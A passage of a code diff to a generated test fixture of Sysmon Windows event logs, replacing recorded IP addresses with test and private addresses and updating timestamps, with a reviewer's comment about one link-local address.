SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10582,27 +10475,27 @@ "type": "CNAME" }, { - "data": "144.76.67.119", + "data": "89.160.20.156", "type": "A" }, { - "data": "148.251.77.207", + "data": "89.160.20.156", "type": "A" }, { - "data": "148.251.15.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "176.9.103.51", + "data": "89.160.20.156", "type": "A" }, { - "data": "88.198.208.110", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10610,7 +10503,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -10618,7 +10511,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10626,23 +10519,23 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "144.76.67.119", - "148.251.77.207", - "148.251.15.115", - "176.9.103.51", - "88.198.208.110", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { 
@@ -10658,24 +10551,20 @@ "farm.plista.com" ], "ip": [ - "144.76.67.119", - "148.251.77.207", - "148.251.15.115", - "176.9.103.51", - "88.198.208.110", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313875589Z", + "ingested": "2021-12-09T13:49:44.739603600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program 
Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10743,52 +10632,52 @@ "type": "CNAME" }, { - "data": "50.17.180.35", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.103.40", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.210.19", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.117.149", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.222.244", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.222.88", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.81.100", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.204.10.30", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "50.17.180.35", - "50.19.103.40", - "50.19.210.19", - "50.19.117.149", - "50.19.222.244", - "50.19.222.88", - "50.19.81.100", - "54.204.10.30", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { 
@@ -10805,21 +10694,14 @@ "beacon.krxd.net" ], "ip": [ - "50.17.180.35", - "50.19.103.40", - "50.19.210.19", - "50.19.117.149", - "50.19.222.244", - "50.19.222.88", - "50.19.81.100", - "54.204.10.30", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313876849Z", + "ingested": "2021-12-09T13:49:44.739609500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files 
(x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", 
@@ -10866,7 +10748,7 @@
 },
 "destination": {
 "port": 137,
- "ip": "169.254.180.25"
+ "ip": "89.160.20.156"
 },
 "source": {
 "port": 137,
@@ -10875,7 +10757,7 @@
 },
 "network": {
 "protocol": "netbios-ns",
- "community_id": "1:r3C/WjbATNIislTQ0M+ySzwnuiw=",
+ "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=",
 "transport": "udp",
 "type": "ipv4",
 "direction": "egress"
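Review bot: The removed `destination.ip` value `169.254.180.25` in the first hunk is a link-local (APIPA) address, not a public one, so it did not need to move to the MaxMind test address; swapping it for `89.160.20.156` turns a NetBIOS name-service (UDP/137) egress toward a link-local neighbour into one aimed at an Internet host, which is not how that event occurs and, if the pipeline applies geo/ASN enrichment to `destination.ip`, changes which path the fixture exercises. Unless the fixture checker also rejects link-local ranges, keep the original address or pick a private one like the `192.168.x.x` values this same diff uses for DNS answers, e.g. `"ip": "192.168.180.25"`. Because this is a generated `-expected.json`, the change belongs in the input `.log` fixture followed by a regeneration, so that `event.original` and the `network.community_id` recomputed in the second hunk stay consistent with whichever address is finally chosen.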
@@ -10890,13 +10772,13 @@ ], "ip": [ "10.0.2.15", - "169.254.180.25" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313878067Z", + "ingested": "2021-12-09T13:49:44.739615300Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:50.357Z", @@ -10949,7 +10831,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313879292Z", + "ingested": "2021-12-09T13:49:44.739621100Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.354274600Z'/\u003e\u003cEventRecordID\u003e24\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.350\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccc6-5c8f-0000-001005082900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4832\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11000,7 +10882,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313880666Z", + "ingested": "2021-12-09T13:49:44.739627Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.364042800Z'/\u003e\u003cEventRecordID\u003e25\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.364\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cccc-5c8f-0000-0010e8272900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e3208\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11061,7 +10943,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313881891Z", + "ingested": "2021-12-09T13:49:44.739633Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.402119100Z'/\u003e\u003cEventRecordID\u003e26\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.387\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\fe823684-c940-49f2-a940-14b02cbafba9.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:04.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.387\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11122,7 +11004,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313883291Z", + "ingested": "2021-12-09T13:49:44.739636900Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e27\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\162d4140-cfab-4d05-9c92-bca60515a622.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:04.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.402\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11183,7 +11065,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313884544Z", + "ingested": "2021-12-09T13:49:44.739641500Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e28\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' 